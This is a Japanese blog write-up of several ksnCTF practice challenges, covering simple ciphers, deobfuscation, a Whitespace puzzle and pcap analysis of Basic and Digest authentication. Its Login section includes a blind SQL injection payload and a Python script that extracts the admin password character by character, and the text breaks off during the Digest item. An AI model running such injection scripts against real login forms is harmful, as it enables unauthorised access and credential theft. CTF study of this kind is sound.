<!doctype html><html lang=ja-jp><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge,chrome=1"><title>Ksnctf writeup | 小倉唯.com</title><meta name=viewport content="width=device-width,minimum-scale=1"><meta name=description content="解き次第書く"><meta name=generator content="Hugo 0.117.0"><meta name=robots content="index, follow"><link rel=stylesheet href=http://xn--0vq68j2yg.com/ananke/css/main.min.583db2df44f25197f10178d930866e6f2e92f79c5bc910541d9e3a652fd39bb1.css><link rel="shortcut icon" href=http://xn--0vq68j2yg.com/images/favicon.ico type=image/x-icon><meta property="og:title" content="Ksnctf writeup"><meta property="og:description" content="解き次第書く"><meta property="og:type" content="article"><meta property="og:url" content="http://xn--0vq68j2yg.com/posts/ksnctf_writeups/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2026-02-07T17:29:43+09:00"><meta property="article:modified_time" content="2026-02-07T17:29:43+09:00"><meta itemprop=name content="Ksnctf writeup"><meta itemprop=description content="解き次第書く"><meta itemprop=datePublished content="2026-02-07T17:29:43+09:00"><meta itemprop=dateModified content="2026-02-07T17:29:43+09:00"><meta itemprop=wordCount content="546"><meta itemprop=keywords content><meta name=twitter:card content="summary"><meta name=twitter:title content="Ksnctf writeup"><meta name=twitter:description content="解き次第書く"><script async src="https://www.googletagmanager.com/gtag/js?id=G-K8PXKYNX9F"></script>
<script>var doNotTrack=!1;if(!doNotTrack){window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments)}gtag("js",new Date),gtag("config","G-K8PXKYNX9F",{anonymize_ip:!1})}</script><script async src="https://www.googletagmanager.com/gtag/js?id=G-K8PXKYNX9F"></script>
<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments)}gtag("js",new Date),gtag("config","G-K8PXKYNX9F")</script></head><body class="ma0 avenir bg-near-white production"><header><div class=bg-black><nav class="pv3 ph3 ph4-ns" role=navigation><div class="flex-l justify-between items-center center"><a href=http://xn--0vq68j2yg.com/ class="f3 fw2 hover-white no-underline white-90 dib">小倉唯.com</a><div class="flex-l items-center"><ul class="pl0 mr3"><li class="list f5 f4-ns fw4 dib pr3"><a class="hover-white no-underline white-90" href=http://xn--0vq68j2yg.com/about/ title="About ページ">About</a></li></ul><div class=ananke-socials><a href=https://x.com/YSecond821 target=_blank rel=noopener class="twitter ananke-social-link link-transition stackoverflow link dib z-999 pt3 pt0-l mr1" title="Twitter link" aria-label="follow on Twitter——Opens in a new window"><span class=icon><svg style="enable-background:new 0 0 67 67" viewBox="0 0 67 67" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M37.167 22.283c-2.619.953-4.274 3.411-4.086 6.101l.063 1.038-1.048-.127c-3.813-.487-7.145-2.139-9.974-4.915l-1.383-1.377-.356 1.017c-.754 2.267-.272 4.661 1.299 6.271.838.89.649 1.017-.796.487-.503-.169-.943-.296-.985-.233-.146.149.356 2.076.754 2.839.545 1.06 1.655 2.097 2.871 2.712l1.027.487-1.215.021c-1.173.0-1.215.021-1.089.467.419 1.377 2.074 2.839 3.918 3.475l1.299.444-1.131.678c-1.676.976-3.646 1.526-5.616 1.568C19.775 43.256 19 43.341 19 43.405c0 .211 2.557 1.397 4.044 1.864 4.463 1.377 9.765.783 13.746-1.568 2.829-1.673 5.657-5 6.978-8.221.713-1.716 1.425-4.851 1.425-6.354.0-.975.063-1.102 1.236-2.267.692-.678 1.341-1.419 1.467-1.631.21-.403.188-.403-.88-.043-1.781.636-2.033.551-1.152-.402.649-.678 1.425-1.907 1.425-2.267.0-.063-.314.042-.671.233-.377.212-1.215.53-1.844.72l-1.131.361-1.027-.7c-.566-.381-1.361-.805-1.781-.932C39.766 21.902 38.131 21.944 37.167 22.283zM33 64C16.432 64 3 50.569 3 34S16.432 4 33 4s30 13.431 30 30S49.568 64 33 64z" style="fill-rule:evenodd;clip-rule:evenodd"/></svg></span><span class=new-window><svg height="8" style="enable-background:new 0 0 1000 1000" viewBox="0 0 1e3 1e3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M598 128h298v298h-86V274L392 692l-60-60 418-418H598v-86zM810 810V512h86v298c0 46-40 86-86 86H214c-48 0-86-40-86-86V214c0-46 38-86 86-86h298v86H214v596h596z" style="fill-rule:evenodd;clip-rule:evenodd"/></svg></span></a></div></div></div></nav></div></header><main class=pb7 role=main><article class="flex-l flex-wrap justify-between mw8 center ph3"><header class="mt4 w-100"><aside class="instapaper_ignoref b helvetica tracked">POSTS</aside><div id=sharing class="mt3 ananke-socials"><a href="https://twitter.com/share?url=http://xn--0vq68j2yg.com/posts/ksnctf_writeups/&amp;text=Ksnctf%20writeup" class="ananke-social-link twitter no-underline" aria-label="share on Twitter"><span class=icon><svg style="enable-background:new 0 0 67 67" viewBox="0 0 67 67" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M37.167 22.283c-2.619.953-4.274 3.411-4.086 6.101l.063 1.038-1.048-.127c-3.813-.487-7.145-2.139-9.974-4.915l-1.383-1.377-.356 1.017c-.754 2.267-.272 4.661 1.299 6.271.838.89.649 1.017-.796.487-.503-.169-.943-.296-.985-.233-.146.149.356 2.076.754 2.839.545 1.06 1.655 2.097 2.871 2.712l1.027.487-1.215.021c-1.173.0-1.215.021-1.089.467.419 1.377 2.074 2.839 3.918 3.475l1.299.444-1.131.678c-1.676.976-3.646 1.526-5.616 1.568C19.775 43.256 19 43.341 19 43.405c0 .211 2.557 1.397 4.044 1.864 4.463 1.377 9.765.783 13.746-1.568 2.829-1.673 5.657-5 6.978-8.221.713-1.716 1.425-4.851 1.425-6.354.0-.975.063-1.102 1.236-2.267.692-.678 1.341-1.419 1.467-1.631.21-.403.188-.403-.88-.043-1.781.636-2.033.551-1.152-.402.649-.678 1.425-1.907 1.425-2.267.0-.063-.314.042-.671.233-.377.212-1.215.53-1.844.72l-1.131.361-1.027-.7c-.566-.381-1.361-.805-1.781-.932C39.766 21.902 38.131 21.944 37.167 22.283zM33 64C16.432 64 3 50.569 3 34S16.432 4 33 4s30 13.431 30 30S49.568 64 33 64z" style="fill-rule:evenodd;clip-rule:evenodd"/></svg></span></a></div><h1 class="f1 athelas mt3 mb1">Ksnctf writeup</h1><time class="f6 mv4 dib tracked" datetime=2026-02-07T17:29:43+09:00>2月 7, 2026</time></header><div class="nested-copy-line-height lh-copy serif f4 nested-links mid-gray pr4-l w-two-thirds-l"><p>解き次第書く</p><h1 id=2-easy-cipher>2 Easy Cipher</h1><p>ただのROT13</p><h1 id=3-crawling-chaos>3 Crawling Chaos</h1><p>与えられるURLにあるhtmlのスクリプトがうーにゃーしている。
スクリプトを切り出してnodeで実行するとエラーが出るものの、デコードしてくれる。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-javascript data-lang=javascript><span style=display:flex><span><span style=color:#a6e22e>PS</span> <span style=color:#a6e22e>C</span><span style=color:#f92672>:</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>Users</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>yokom</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>Desktop</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>CTF</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>CTF</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>ksnCTF</span><span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>CrawlingChaos</span><span style=color:#f92672>&gt;</span> <span style=color:#a6e22e>node</span> .<span style=color:#960050;background-color:#1e0010>\</span><span style=color:#a6e22e>unya</span>.<span style=color:#a6e22e>js</span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>undefined</span><span style=color:#f92672>:</span><span style=color:#ae81ff>3</span>
</span></span><span style=display:flex><span><span style=color:#a6e22e>$</span>(<span style=color:#66d9ef>function</span>(){<span style=color:#a6e22e>$</span>(<span style=color:#e6db74>&#34;form&#34;</span>).<span style=color:#a6e22e>submit</span>(<span style=color:#66d9ef>function</span>(){<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>t</span><span style=color:#f92672>=</span><span style=color:#a6e22e>$</span>(<span style=color:#e6db74>&#39;input[type=&#34;text&#34;]&#39;</span>).<span style=color:#a6e22e>val</span>();<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>p</span><span style=color:#f92672>=</span>Array(<span style=color:#ae81ff>70</span>,<span style=color:#ae81ff>152</span>,<span style=color:#ae81ff>195</span>,<span style=color:#ae81ff>284</span>,<span style=color:#ae81ff>475</span>,<span style=color:#ae81ff>612</span>,<span style=color:#ae81ff>791</span>,<span style=color:#ae81ff>896</span>,<span style=color:#ae81ff>810</span>,<span style=color:#ae81ff>850</span>,<span style=color:#ae81ff>737</span>,<span style=color:#ae81ff>1332</span>,<span style=color:#ae81ff>1469</span>,<span style=color:#ae81ff>1120</span>,<span style=color:#ae81ff>1470</span>,<span style=color:#ae81ff>832</span>,<span style=color:#ae81ff>1785</span>,<span style=color:#ae81ff>2196</span>,<span style=color:#ae81ff>1520</span>,<span style=color:#ae81ff>1480</span>,<span style=color:#ae81ff>1449</span>);<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>f</span><span style=color:#f92672>=</span><span style=color:#66d9ef>false</span>;<span style=color:#66d9ef>if</span>(<span style=color:#a6e22e>p</span>.<span style=color:#a6e22e>length</span><span style=color:#f92672>==</span><span style=color:#a6e22e>t</span>.<span style=color:#a6e22e>length</span>){<span style=color:#a6e22e>f</span><span style=color:#f92672>=</span><span style=color:#66d9ef>true</span>;<span style=color:#66d9ef>for</span>(<span style=color:#66d9ef>var</span> <span style=color:#a6e22e>i</span><span style=color:#f92672>=</span><span style=color:#ae81ff>0</span>;<span style=color:#a6e22e>i</span><span style=color:#f92672>&lt;</span><span style=color:#a6e22e>p</span>.<span style=color:#a6e22e>length</span>;<span style=color:#a6e22e>i</span><span style=color:#f92672>++</span>)<span style=color:#66d9ef>if</span>(<span style=color:#a6e22e>t</span>.<span style=color:#a6e22e>charCodeAt</span>(<span style=color:#a6e22e>i</span>)<span style=color:#f92672>*</span>(<span style=color:#a6e22e>i</span><span style=color:#f92672>+</span><span style=color:#ae81ff>1</span>)<span style=color:#f92672>!=</span><span style=color:#a6e22e>p</span>[<span style=color:#a6e22e>i</span>])<span style=color:#a6e22e>f</span><span style=color:#f92672>=</span><span style=color:#66d9ef>false</span>;<span style=color:#66d9ef>if</span>(<span style=color:#a6e22e>f</span>)<span style=color:#a6e22e>alert</span>(<span style=color:#e6db74>&#34;(」・ω・)」うー!(/・ω・)/にゃー!&#34;</span>);}<span style=color:#66d9ef>if</span>(<span style=color:#f92672>!</span><span style=color:#a6e22e>f</span>)<span style=color:#a6e22e>alert</span>(<span style=color:#e6db74>&#34;No&#34;</span>);<span style=color:#66d9ef>return</span> <span style=color:#66d9ef>false</span>;});});
</span></span><span style=display:flex><span><span style=color:#f92672>^</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a6e22e>ReferenceError</span><span style=color:#f92672>:</span> <span style=color:#a6e22e>$</span> <span style=color:#a6e22e>is</span> <span style=color:#a6e22e>not</span> <span style=color:#a6e22e>defined</span>
</span></span><span style=display:flex><span><span style=color:#f92672>&lt;</span><span style=color:#a6e22e>OMIT</span>....<span style=color:#f92672>&gt;</span>
</span></span></code></pre></div><p><code>array</code>を取り出していい感じに計算してやるとフラグ</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>array <span style=color:#f92672>=</span> [<span style=color:#ae81ff>70</span>, <span style=color:#ae81ff>152</span>, <span style=color:#ae81ff>195</span>, <span style=color:#ae81ff>284</span>, <span style=color:#ae81ff>475</span>, <span style=color:#ae81ff>612</span>, <span style=color:#ae81ff>791</span>, <span style=color:#ae81ff>896</span>, <span style=color:#ae81ff>810</span>, <span style=color:#ae81ff>850</span>, <span style=color:#ae81ff>737</span>, <span style=color:#ae81ff>1332</span>, <span style=color:#ae81ff>1469</span>, <span style=color:#ae81ff>1120</span>, <span style=color:#ae81ff>1470</span>, <span style=color:#ae81ff>832</span>, <span style=color:#ae81ff>1785</span>, <span style=color:#ae81ff>2196</span>, <span style=color:#ae81ff>1520</span>, <span style=color:#ae81ff>1480</span>, <span style=color:#ae81ff>1449</span>]
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>for</span> i <span style=color:#f92672>in</span> range(len(array)):
</span></span><span style=display:flex><span>    print(chr(int(array[i] <span style=color:#f92672>/</span> (i<span style=color:#f92672>+</span><span style=color:#ae81ff>1</span>))), end<span style=color:#f92672>=</span><span style=color:#e6db74>&#39;&#39;</span>)
</span></span></code></pre></div><h1 id=5-onion>5 Onion</h1><p>BASE64と思われる文字列が与えられる。
数回デコードを繰り返すと以下の文字列になる。</p><pre tabindex=0><code>begin 666 &lt;data&gt;
51DQ!1U]&amp;94QG4#-3:4%797I74$AU
 
end
</code></pre><p>一行目をググるとuuencodeでエンコードされている文字列らしい</p><p><a href=https://www.motohasi.net/Misc/UUConv.php>decoder</a></p><h1 id=6-login>6 Login</h1><p>与えられるURLにアクセスするとログインフォームがある。
いつものSQLインジェクションをするとページのソースコードが表示された。</p><p><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf6-1.png></figure><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf6-2.png></figure></p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-PHP data-lang=PHP><span style=display:flex><span><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>function</span> <span style=color:#a6e22e>h</span>($s){<span style=color:#66d9ef>return</span> <span style=color:#a6e22e>htmlspecialchars</span>($s,<span style=color:#a6e22e>ENT_QUOTES</span>,<span style=color:#e6db74>&#39;UTF-8&#39;</span>);}
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span>    $id <span style=color:#f92672>=</span> <span style=color:#a6e22e>isset</span>($_POST[<span style=color:#e6db74>&#39;id&#39;</span>]) <span style=color:#f92672>?</span> $_POST[<span style=color:#e6db74>&#39;id&#39;</span>] <span style=color:#f92672>:</span> <span style=color:#e6db74>&#39;&#39;</span>;
</span></span><span style=display:flex><span>    $pass <span style=color:#f92672>=</span> <span style=color:#a6e22e>isset</span>($_POST[<span style=color:#e6db74>&#39;pass&#39;</span>]) <span style=color:#f92672>?</span> $_POST[<span style=color:#e6db74>&#39;pass&#39;</span>] <span style=color:#f92672>:</span> <span style=color:#e6db74>&#39;&#39;</span>;
</span></span><span style=display:flex><span>    $login <span style=color:#f92672>=</span> <span style=color:#66d9ef>false</span>;
</span></span><span style=display:flex><span>    $err <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;&#39;</span>;
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> ($id<span style=color:#f92672>!==</span><span style=color:#e6db74>&#39;&#39;</span>)
</span></span><span style=display:flex><span>    {
</span></span><span style=display:flex><span>        $db <span style=color:#f92672>=</span> <span style=color:#66d9ef>new</span> <span style=color:#a6e22e>PDO</span>(<span style=color:#e6db74>&#39;sqlite:database.db&#39;</span>);
</span></span><span style=display:flex><span>        $db<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>setAttribute</span>(<span style=color:#a6e22e>PDO</span><span style=color:#f92672>::</span><span style=color:#a6e22e>ATTR_ERRMODE</span>, <span style=color:#a6e22e>PDO</span><span style=color:#f92672>::</span><span style=color:#a6e22e>ERRMODE_SILENT</span>);
</span></span><span style=display:flex><span>        $r <span style=color:#f92672>=</span> $db<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>query</span>(<span style=color:#e6db74>&#34;SELECT * FROM user WHERE id=&#39;</span><span style=color:#e6db74>$id</span><span style=color:#e6db74>&#39; AND pass=&#39;</span><span style=color:#e6db74>$pass</span><span style=color:#e6db74>&#39;&#34;</span>);
</span></span><span style=display:flex><span>        $login <span style=color:#f92672>=</span> $r <span style=color:#f92672>&amp;&amp;</span> $r<span style=color:#f92672>-&gt;</span><span style=color:#a6e22e>fetch</span>();
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>if</span> (<span style=color:#f92672>!</span>$login)
</span></span><span style=display:flex><span>            $err <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;Login Failed&#39;</span>;
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span><span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>&lt;!DOCTYPE html&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>&lt;html&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>  &lt;head&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;meta charset=&#34;utf-8&#34;&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;title&gt;q6q6q6q6q6q6q6q6q6q6q6q6q6q6q6q6&lt;/title&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>  &lt;/head&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>  &lt;body&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;?php if (!$login) { ?&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;p&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      First, login as &#34;admin&#34;.
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;/p&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;div style=&#34;font-weight:bold; color:red&#34;&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      &lt;?php echo h($err); ?&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;/div&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;form method=&#34;POST&#34;&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      &lt;div&gt;ID: &lt;input type=&#34;text&#34; name=&#34;id&#34; value=&#34;&lt;?php echo h($id); ?&gt;&#34;&gt;&lt;/div&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      &lt;div&gt;Pass: &lt;input type=&#34;text&#34; name=&#34;pass&#34; value=&#34;&lt;?php echo h($pass); ?&gt;&#34;&gt;&lt;/div&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      &lt;div&gt;&lt;input type=&#34;submit&#34;&gt;&lt;/div&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;/form&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;?php } else { ?&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;p&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      Congratulations!&lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      It&#39;s too easy?&lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      Don&#39;t worry.&lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      The flag is admin&#39;s password.&lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      &lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>      Hint:&lt;br&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;/p&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;pre&gt;&lt;?php echo h(file_get_contents(&#39;index.php&#39;)); ?&gt;&lt;/pre&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>    &lt;?php } ?&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>  &lt;/body&gt;
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>&lt;/html&gt;
</span></span></span></code></pre></div><p>現時点でわかっていることは以下の通り。</p><ul><li>Adminのパスワードがフラグであり、ksnCTFのフラグ形式は<code>FLAG_&lt;アルファベットと数字></code>である。</li><li>ログインに成功するとソースコードが表示される。</li></ul><p>これよりBlindSQLInjectionが可能であると仮定し、検証を行った。
パスワードの1文字目はフラグ形式より、<code>F</code>である。そのため、DBのパスワードの1文字目が<code>F</code>であればTRUEになるようなクエリをソースコードを参考に考える。</p><p><code>subster</code>関数とサブクエリを用いて、パスワードから1文字目を取り出して<code>F</code>と比較すればTRUEになる。よって以下のクエリが出来上がる。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-SQL data-lang=SQL><span style=display:flex><span><span style=color:#66d9ef>SELECT</span> <span style=color:#f92672>*</span> <span style=color:#66d9ef>FROM</span> <span style=color:#66d9ef>user</span> <span style=color:#66d9ef>WHERE</span> id<span style=color:#f92672>=</span><span style=color:#e6db74>&#39;$id&#39;</span> <span style=color:#66d9ef>AND</span> pass<span style=color:#f92672>=</span><span style=color:#e6db74>&#39;&#39;</span> <span style=color:#66d9ef>OR</span> <span style=color:#e6db74>&#39;F&#39;</span><span style=color:#f92672>=</span>substr((<span style=color:#66d9ef>select</span> pass <span style=color:#66d9ef>from</span> <span style=color:#66d9ef>user</span> <span style=color:#66d9ef>where</span> id<span style=color:#f92672>=</span><span style=color:#e6db74>&#39;admin&#39;</span>),<span style=color:#ae81ff>1</span>,<span style=color:#ae81ff>1</span>); <span style=color:#75715e>--
</span></span></span></code></pre></div><p>上記のクエリから不要な部分を取り除いて投げると、ソースコードが表示されSQLInjectionに成功した。</p><p>この結果より、パスワードに適切な一文字を追加->サイトに投げる->結果によって次の桁に進むor進まずに次に試す文字を変える。
を自動で試すスクリプトを書いた。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#f92672>import</span> requests
</span></span><span style=display:flex><span><span style=color:#f92672>import</span> string
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>url <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;https://ctfq.u1tramarine.blue/q6/&#39;</span>
</span></span><span style=display:flex><span>allString <span style=color:#f92672>=</span> string<span style=color:#f92672>.</span>ascii_letters <span style=color:#f92672>+</span> string<span style=color:#f92672>.</span>digits
</span></span><span style=display:flex><span>flagLen <span style=color:#f92672>=</span> <span style=color:#ae81ff>5</span>
</span></span><span style=display:flex><span>flagStr <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;&#39;</span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>for</span> i <span style=color:#f92672>in</span> range(<span style=color:#ae81ff>1</span>, <span style=color:#ae81ff>21</span>):
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>for</span> j <span style=color:#f92672>in</span> range(len(allString)):
</span></span><span style=display:flex><span>        tmp <span style=color:#f92672>=</span> flagStr
</span></span><span style=display:flex><span>        tmp <span style=color:#f92672>+=</span> allString[j]
</span></span><span style=display:flex><span>        SQL <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;&#39; OR &#39;FLAG_&#34;</span> <span style=color:#f92672>+</span> tmp <span style=color:#f92672>+</span><span style=color:#e6db74>&#34;&#39;=substr((select pass from user where id=&#39;admin&#39;),1,&#34;</span> <span style=color:#f92672>+</span> str(flagLen <span style=color:#f92672>+</span> i) <span style=color:#f92672>+</span><span style=color:#e6db74>&#34;); --&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        data <span style=color:#f92672>=</span> {<span style=color:#e6db74>&#39;id&#39;</span>: <span style=color:#e6db74>&#39;admin&#39;</span>, <span style=color:#e6db74>&#39;pass&#39;</span>: SQL}
</span></span><span style=display:flex><span>        response <span style=color:#f92672>=</span> requests<span style=color:#f92672>.</span>post(url<span style=color:#f92672>=</span>url, data<span style=color:#f92672>=</span>data)
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>if</span> <span style=color:#e6db74>&#39;Congratulation&#39;</span> <span style=color:#f92672>in</span> response<span style=color:#f92672>.</span>text:
</span></span><span style=display:flex><span>            <span style=color:#75715e>#print(response.text)</span>
</span></span><span style=display:flex><span>            print(<span style=color:#e6db74>&#39;FLAG_&#39;</span> <span style=color:#f92672>+</span> tmp)
</span></span><span style=display:flex><span>            flagStr <span style=color:#f92672>=</span> tmp
</span></span></code></pre></div><p>フラグでた</p><pre tabindex=0><code>PS C:\ksnCTF\Login&gt; python .\blindSQLinjection.py
FLAG_K
FLAG_Kp
FLAG_KpW
FLAG_KpWa
FLAG_KpWa4
FLAG_KpWa4j
&lt;OMIT...&gt;
</code></pre><h1 id=7-programming>7 Programming</h1><p>C++のソースが与えられるが何か変。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c++ data-lang=c++><span style=display:flex><span><span style=color:#75715e>#include</span>   	 	<span style=color:#75715e>&lt;stdio.h&gt;    </span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	
</span></span><span style=display:flex><span>     	<span style=color:#75715e>#include</span>  	  <span style=color:#75715e>&lt;string.h&gt;	</span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>int</span>   	  	<span style=color:#a6e22e>main</span>		 
</span></span><span style=display:flex><span>	()
</span></span><span style=display:flex><span>   {   	<span style=color:#66d9ef>const</span>		<span style=color:#66d9ef>char</span> 	<span style=color:#f92672>*</span> 
</span></span><span style=display:flex><span>s	<span style=color:#f92672>=</span>
</span></span><span style=display:flex><span> <span style=color:#e6db74>&#34;     	    &#34;</span> 
</span></span><span style=display:flex><span><span style=color:#e6db74>&#34;0123456789&#34;</span>	
</span></span><span style=display:flex><span><span style=color:#e6db74>&#34;     &#34;</span>
</span></span><span style=display:flex><span>	
</span></span><span style=display:flex><span><span style=color:#e6db74>&#34;		   &#34;</span>
</span></span><span style=display:flex><span><span style=color:#e6db74>&#34;			         							  				 			 &#34;</span>    	  
</span></span><span style=display:flex><span>	 <span style=color:#e6db74>&#34;ABCDEFGHIJ&#34;</span> 	;
</span></span><span style=display:flex><span><span style=color:#f92672>&lt;</span>OMIT...<span style=color:#f92672>&gt;</span>
</span></span></code></pre></div><p>とりあえずコンパイルして実行。</p><pre tabindex=0><code>PS C:\ksnCTF\Programming&gt; .\a.exe
FROG_This_is_wrong_:(
</code></pre><p>うるさい。</p><p>「プログラミング + 空白」というと難解言語の<a href=https://ja.wikipedia.org/wiki/Whitespace>WhiteSpace</a>が思い浮かぶ。</p><p>ググると<a href=https://vii5ard.github.io/whitespace/>IDE</a>がみつかる。</p><p>貼り付けて実行するとPINを求められる。</p><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf7-1.png></figure><p>よくわからんので右側のDebugにあるPINっぽいのを入れてみる。</p><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf7-2.png></figure><p>でた。</p><h1 id=8-basic-is-secure>8 Basic is secure?</h1><p>与えられたpcapを見ると、とあるサイトに対してBasic認証でログインしている。
Basic認証はIDとパスワードをBASE64エンコードして送っているだけなので該当のパケットからBASE64文字列を取り出してデコードする。</p><h1 id=9-digest-is-secure>9 Digest is secure!</h1><p>与えられたpcapを見るとサイトに対してDigest認証でログインしている。また、ログイン後にhtdigestにアクセスしている。</p><p>Digest認証においてクライアントが計算するResponseは以下のように求める。<a href=https://ja.wikipedia.org/wiki/Digest%E8%AA%8D%E8%A8%BC>引用</a></p><pre tabindex=0><code>A1 = ユーザ名 &#34;:&#34; realm &#34;:&#34; パスワード
A2 = HTTPのメソッド &#34;:&#34; コンテンツのURI
response = MD5( MD5(A1) &#34;:&#34; nonce &#34;:&#34; nc &#34;:&#34; cnonce &#34;:&#34; qop &#34;:&#34; MD5(A2) )
</code></pre><p>上記のうち、MD5(A1)については、htdigestの3要素目にある。</p><pre tabindex=0><code>GET /q9/htdigest HTTP/1.1
Host: ctfq.u1tramarine.blue
Connection: keep-alive
Authorization: Digest username=&#34;q9&#34;, realm=&#34;secret&#34;, nonce=&#34;HHj57RG8BQA=4714c627c5195786fc112b67eca599d675d5454b&#34;, uri=&#34;/q9/htdigest&#34;, algorithm=MD5, response=&#34;e9654c012dc42f9f78f81a685073df98&#34;, qop=auth, nc=00000003, cnonce=&#34;1064eaa9478a0396&#34;
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ja


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Feb 2021 09:48:08 GMT
Content-Length: 42
Connection: keep-alive
